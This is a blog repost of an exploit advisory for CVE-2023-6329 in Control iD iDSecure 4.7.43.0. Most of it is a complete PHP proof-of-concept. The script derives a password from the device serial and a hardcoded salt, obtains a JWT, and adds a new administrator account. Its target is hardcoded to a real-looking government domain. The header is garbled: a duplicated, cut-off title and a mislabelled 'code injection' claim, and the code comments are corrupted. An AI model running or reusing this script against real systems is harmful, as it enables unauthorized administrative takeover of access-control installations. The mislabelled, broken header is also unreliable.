Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

Control iD iDSecure 4.7.43.0 Add Administrator / Authentication Bypass

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 101
=============================================================================================================================================
| # Title : Control iD =============================================================================================================================================
| # Title : Control iD iDSecure v4.7.43.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://profil.nunukankab.go.id/org/dkisp |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: The code exploits a vulnerability in the ControlID system to add a new administrative user without requiring an existing password.

( https://packetstorm.news/files/id/180858/ CVE-2023-6329)

[+] save code as poc.php.

[+] Set Target : line 114

[+] USage : php poc.php

[+] PayLoad :

<?php

class ControlIDExploit {
private $target;
private $new_user;
private $new_password;

public function __construct($target, $new_user, $new_password) {
$this->target = rtrim($target, '/'); // ????? ?? "/" ????? ?? ???????
$this->new_user = $new_user;
$this->new_password = $new_password;
}

private function send_request($method, $uri, $data = null, $headers = []) {
$url = "{$this->target}{$uri}";
$ch = curl_init($url);

curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // ???? ????? 10 ?????

if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data, JSON_UNESCAPED_UNICODE));
$headers[] = 'Content-Type: application/json';
}

if (!empty($headers)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
}

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);

if ($error) {
die(" Error connecting to $url: $error\n");
}

if ($http_code == 404) {
die(" Unexpected response (404 - Not Found): Check the link is valid $url\n");
}

return json_decode(mb_convert_encoding($response, 'UTF-8', 'auto'), true);
}

public function exploit() {
echo " Trying to get the raw data...\n";

// 1) ?????? ??? serial ? passwordRandom
$response = $this->send_request('GET', '/api/login/unlockGetData');

if (!isset($response['passwordRandom']) || !isset($response['serial'])) {
die("? Failed to get raw data. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}

$password_random = $response['passwordRandom'];
$serial = $response['serial'];

echo " Retrieved passwordRandom: $password_random\n";
echo " Retrieved serial: $serial\n";

// 2) ????? passwordCustom
$sha1_hash = sha1($serial);
$combined_string = $sha1_hash . $password_random . 'cid2016';
$sha256_hash = hash('sha256', $combined_string);
$short_hash = substr($sha256_hash, 0, 6);
$password_custom = hexdec($short_hash);

echo " Created passwordCustom: $password_custom\n";

// 3) ????? ?????? ?????? ??? JWT
echo "Attempt to login...\n";
$login_data = [
'passwordCustom' => (string)$password_custom,
'passwordRandom' => $password_random
];

$response = $this->send_request('POST', '/api/login/', $login_data);
if (!isset($response['accessToken'])) {
die(" Login failed. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}

$access_token = $response['accessToken'];
echo " Obtained JWT: $access_token\n";

// 4) ????? ?????? ????? ????
echo " Trying to add a new user...\n";
$user_data = [
'idType' => '1',
'name' => $this->new_user,
'user' => $this->new_user,
'newPassword' => $this->new_password,
'password_confirmation' => $this->new_password
];

$headers = [
"Authorization: Bearer $access_token"
];

$response = $this->send_request('POST', '/api/operator/', $user_data, $headers);
if (!isset($response['code']) || $response['code'] != 200) {
die(" Failed to add new user. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}

echo " User added successfully: {$this->new_user}:{$this->new_password}\n";
}
}

// ? ???? ?????? ????????? ???
$target_host = 'https://profil.nunukankab.go.id'; // ?????? ?????? ??????
$new_admin_user = 'adminuser';
$new_admin_password = 'securepassword';

// ????? ?????
$exploit = new ControlIDExploit($target_host, $new_admin_user, $new_admin_password);
$exploit->exploit();


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Social Media Share